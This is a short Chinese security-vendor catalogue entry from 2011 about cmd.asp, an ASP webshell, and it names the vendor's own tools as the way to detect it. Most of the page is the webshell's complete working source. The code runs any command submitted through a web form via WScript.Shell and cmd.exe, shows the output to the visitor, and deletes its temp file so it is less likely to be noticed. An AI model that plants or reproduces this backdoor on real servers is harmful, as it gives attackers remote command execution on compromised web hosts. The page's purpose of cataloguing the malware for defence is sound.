cmd.asp的asp脚本webshell

2011-12-28 15:55:53 来源:本站原创,请勿转载 浏览:599
cmd.asp的asp脚本webshell

木马名称:cmd.asp
木马格式:asp
默认密码:
木马作用:asp脚本webshell,执行cmd命令,危险后门。

运行界面如下:(图片若超出屏幕,请右键另存到本地查看)

总结:cmd.asp的asp脚本webshell,执行cmd命令,危险后门。
防御方法:护卫神入侵防护系统、护卫神云查杀均可查杀 cmd.asp 这个asp网页木马。

cmd.asp代码片段:
<%
Dim oScript
Dim oScriptnet
Dim oFileSys, oFile
Dim szCMD,szTempFile
szCMD=request.form(".cmd")
'从输入框得到cmd
On Error Resume Next
'如果出现错误,直接跳过,防止弹出错误窗口
set oScript=server.createobject("WSCRIPT.SHELL")
'建立shell(wshshell)对象
set oFileSys=server.createobject("scripting.filesystemobject")
szTempFile="C:\"& oFileSys.GetTempName()
'GetTempName()是fso建立临时文件的一种方法
Call oScript.Run ("cmd.exe /c "& szCMD &">" &szTempFile,0,true)
'调用wshshell函数的run来执行命令,并把它重定向到临时文件夹中
set oFile=oFileSys.OpenTextFile(szTempFile,1,False,0)
'以读的方式打开临时文件
%>
<HTML>
<body bgcolor="#C0C0C0" text="#000000">
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="好了" class=input>
</FORM>
<PRE>
<%
On Error Resume Next
response.write server.HTMLEncode(oFile.ReadAll)
'输出编码后的文件内容a
oFile.close
'关闭文件
call oFileSys.DeleteFile(szTempFile,True)
'防止被抓住所以删除文件
%>
</body>
</html>

(0)
(0)